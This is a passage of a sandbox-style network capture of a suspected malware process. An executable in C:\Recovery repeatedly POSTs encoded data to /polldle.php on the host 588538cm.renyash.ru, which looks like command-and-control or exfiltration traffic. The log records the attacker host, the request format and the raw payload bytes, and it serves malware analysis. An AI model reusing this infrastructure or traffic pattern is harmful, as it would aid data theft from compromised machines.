                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7860&min_rtt=1610&rtt_var=10096&sent=99&recv=269&lost=0&retrans=0&sent_bytes=1849&recv_bytes=252895&delivery_rate=1755862&cwnd=201&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                23 | 192.168.2.4 | 49838 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:14.434283018 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:14.786067963 CET | 2504 | OUT | Data Raw: 58 58 51 50 5a 45 5f 58 54 5d 55 5a 50 5f 59 5e 50 5d 5a 59 57 52 50 57 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XXQPZE_XT]UZP_Y^P]ZYWRPW[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#-#%%,Y&=0<&"<=;#<<,&3T:([";Z+%#X'/\/(
                                                                                Jan 11, 2025 23:33:14.908651114 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:15.151957989 CET | 810 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:15 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8L8G4Xx2zaL%2BS8I02RVl2MDgz0NdQMWtaNXhn1%2BH9K9CwQGUn0eloQM4fV94F%2FY4FOAE2nOOFDcJ8MTPVeKCMZNx1VCCeMT126ROHrw%2FqPzG%2B2eD6UuSTYueVsRaEO%2BgFFwOHXrr"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e0bee684390-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3898&min_rtt=1758&rtt_var=4940&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=77326&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                24 | 192.168.2.4 | 49844 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:15.280251980 CET | 295 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:15.629965067 CET | 2504 | OUT | Data Raw: 5d 5c 51 55 5a 44 5a 5e 54 5d 55 5a 50 55 59 5b 50 56 5a 53 57 56 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]\QUZDZ^T]UZPUY[PVZSWVPV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#-3.@2$]%!5]3?1V",:,'_(,3U&#&V9$ "T;+%#X'/\/
                                                                                Jan 11, 2025 23:33:15.721472025 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:15.994685888 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:15 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=91GriX%2B7SZUb2T%2F5K%2BURD59jDxKwVDgGUPf5tNjlcUhNUqHA5PjtmZ%2BxVpSBsCSf34knH69rucea9SUsxchRIqI1IqHWbP6QMUgvq1EpaSckcMKWywp89z9TABBtImarxLzjoBgE"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e110a2a422d-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1791&min_rtt=1618&rtt_var=953&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=485856&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                25 | 192.168.2.4 | 49854 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:17.024131060 CET | 295 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:17.379843950 CET | 2504 | OUT | Data Raw: 58 59 51 53 5f 46 5a 58 54 5d 55 5a 50 5a 59 5f 50 5d 5a 5f 57 5d 50 57 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XYQS_FZXT]UZPZY_P]Z_W]PW[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#C96D2;?&T=3) <-(4(<<1&V-4'!3+%#X'/\/<
                                                                                Jan 11, 2025 23:33:17.477343082 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:17.733412981 CET | 812 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:17 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Go8UI%2Bq%2BWFoE0afw6OAZMc%2B3u7ixEn29mILEIo80tjfTzEejHgMBuHEMh%2F16Ok%2BPBG0ZvmQaHgo41Dh3%2BpEYozARfPqefe1ZDX9MYgZiJuC7JwcMY8616NL%2FJqVF1VcfqpFBZopo"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e1bfb0680df-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4817&min_rtt=1747&rtt_var=6796&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=55492&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                26 | 192.168.2.4 | 49861 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:17.867625952 CET | 295 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:18.223650932 CET | 2504 | OUT | Data Raw: 58 5d 54 50 5f 41 5f 5f 54 5d 55 5a 50 58 59 51 50 50 5a 5c 57 5c 50 5b 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X]TP_A__T]UZPXYQPPZ\W\P[[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#- 11<]%29X'?#<*/;+<&U*R.47"T3(#X'/\/4
                                                                                Jan 11, 2025 23:33:18.327264071 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:18.542332888 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:18.564810991 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:18 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rcJj4TRhGzX7uEpxX2QvtoTXIsQ95rkoYPxBPJ4v7xy31CwuBF%2BHG3IluMP9aET2w%2B4ZtNX5Z6STLW6o1JAdRprDJbEBjGuhNO1hxkZniyr3F0bvFyFCDgUmiTybynWPUusqhvFi"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e214cc78c3f-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8415&min_rtt=2052&rtt_var=13496&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=27568&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                27 | 192.168.2.4 | 49867 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:18.696016073 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2500
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:19.051716089 CET | 2500 | OUT | Data Raw: 58 5d 51 55 5a 45 5a 5d 54 5d 55 5a 50 5c 59 51 50 5d 5a 5e 57 50 50 5e 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X]QUZEZ]T]UZP\YQP]Z^WPP^[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#- )$;/1!5'& >8+)/W1&U:!T0?%#X'/\/
                                                                                Jan 11, 2025 23:33:19.143745899 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:19.435286045 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:19 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l8S2VwkGX%2BEhn%2BNcwq0siVyV2e3VlhOpn6BBStALp9t5m%2FubEfZoutUIdZaVi7usynnB4g%2BFZ4IREuM5O5lT2DuM6TEeSijZar1Kx7pL1%2FUzeQv8YM4MPik12hP7GwCDLLr30ca2"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e266b627279-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2057&min_rtt=2004&rtt_var=858&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2819&delivery_rate=600082&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a
                                                                                Data Ascii: 4<YW[
                                                                                Jan 11, 2025 23:33:19.522624969 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                28 | 192.168.2.4 | 49873 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:19.660131931 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:20.004890919 CET | 2504 | OUT | Data Raw: 5d 5c 54 5f 5a 41 5a 5e 54 5d 55 5a 50 5b 59 50 50 50 5a 53 57 5d 50 58 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]\T_ZAZ^T]UZP[YPPPZSW]PX[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#G,#2(1"!$Y1 /6/+?'T&#T.$?#!$+#X'/\/
                                                                                Jan 11, 2025 23:33:20.121726036 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:20.363137007 CET | 810 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:20 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9BC%2BOjj%2BOS0%2BxpPgFc%2BwNuL3Wyr8PUNr41jLdeWQX4hGyQKuSzB0GzlGcRqRO46nJdaPQ%2BE83VAHNC%2BYEEgCfI37jn6sxs16QfqxKT8j4bsvuHL938kwjojZFIEshiJCtOZNN120"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e2c7d3b0f4b-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4426&min_rtt=1579&rtt_var=6287&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=59936&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                29 | 192.168.2.4 | 49879 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:20.494895935 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:20.848649979 CET | 2504 | OUT | Data Raw: 5d 59 54 55 5f 46 5a 5a 54 5d 55 5a 50 5b 59 50 50 50 5a 52 57 55 50 5f 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]YTU_FZZT]UZP[YPPPZRWUP_[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU -#&2<&!>%?T &;'_(23.'(#"?#X'/\/
                                                                                Jan 11, 2025 23:33:20.959706068 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                30 | 192.168.2.4 | 49885 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:21.167808056 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1620
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:21.520459890 CET  1620               OUT
                                                                                Jan 11, 2025 23:33:21.636883974 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:21.888324022 CET  947                IN         HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:21 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HrBN8aRTILWbxxIvV9dXtS0IPjMnXf91PyBEBOrm4hObvFQzlITT4OynmcjIxB0TuqEn067Ck0mdzQ0gZRXHsyDRggDzx8o6jwNGsuqGq4IV2goouyHuIoZvI8S85oHu8m6QJ3mD"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e35f8f77d05-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4986&min_rtt=2032&rtt_var=6671&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1939&delivery_rate=56877&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                31          192.168.2.4  49886        104.21.38.84    80                8604  C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp                            Bytes transferred  Direction  Data
                                                                                Jan 11, 2025 23:33:21.293941975 CET  319                OUT        POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:21.645466089 CET  2504               OUT
                                                                                Jan 11, 2025 23:33:21.757096052 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:22.000773907 CET  805                IN         HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:21 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W4qgTrIAvdxdZxjoJ8UYcL5x8hiRVTZgObgdGUCYUsQuwD3kc7m2QVVI3mB7koQ2iHd%2BF%2FL3IJmOl5yFVdREp1TL2W1iY2ksuFYSfAHGmVKgP8pEAYKBrmKAhP9M1gS1ul4lIGo%2B"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e36bf5b0cba-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3259&min_rtt=1701&rtt_var=3755&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=103041&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                32          192.168.2.4  49892        104.21.38.84    80                8604  C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp                            Bytes transferred  Direction  Data
                                                                                Jan 11, 2025 23:33:22.137902021 CET  295                OUT        POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:22.489276886 CET  2504               OUT
                                                                                Jan 11, 2025 23:33:22.581279993 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:22.817150116 CET  807                IN         HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:22 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j3u5BtV5wkFR2Xq8TZxeQk7lbyXiErtndB%2BsYZX%2FfMEu4yUoUIUIIeSrZIi9ga8hxn2rPqCRnlGORXaVlMB3dz4H2S340%2BcetDW%2BK0WQZXeLtolpiPpVJ3a85e6sNCXBLk2R09wp"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e3bee80c345-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3251&min_rtt=1661&rtt_var=3803&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=101501&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                33          192.168.2.4  49898        104.21.38.84    80                8604  C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp                            Bytes transferred  Direction  Data
                                                                                Jan 11, 2025 23:33:23.050952911 CET  295                OUT        POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:23.410994053 CET  2504               OUT
                                                                                Jan 11, 2025 23:33:23.514339924 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:23.761473894 CET  808                IN         HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:23 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CiNuZ%2FRGEjXs6ubjjtr0tl7nnylPgNVLXIHxcg%2BuWR95shFJL0W%2FQJ4OAuXRawr7WZTvFKCb9%2BpGv3n2U%2FZ840HC3WwNVlD3x1B9f2VwvbxYZtNVegwCXy6iP5YLNTcvpODYTKsR"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e41ac23c46b-EWR
                                                                                alt-svc: h3=":443"; ma=86400
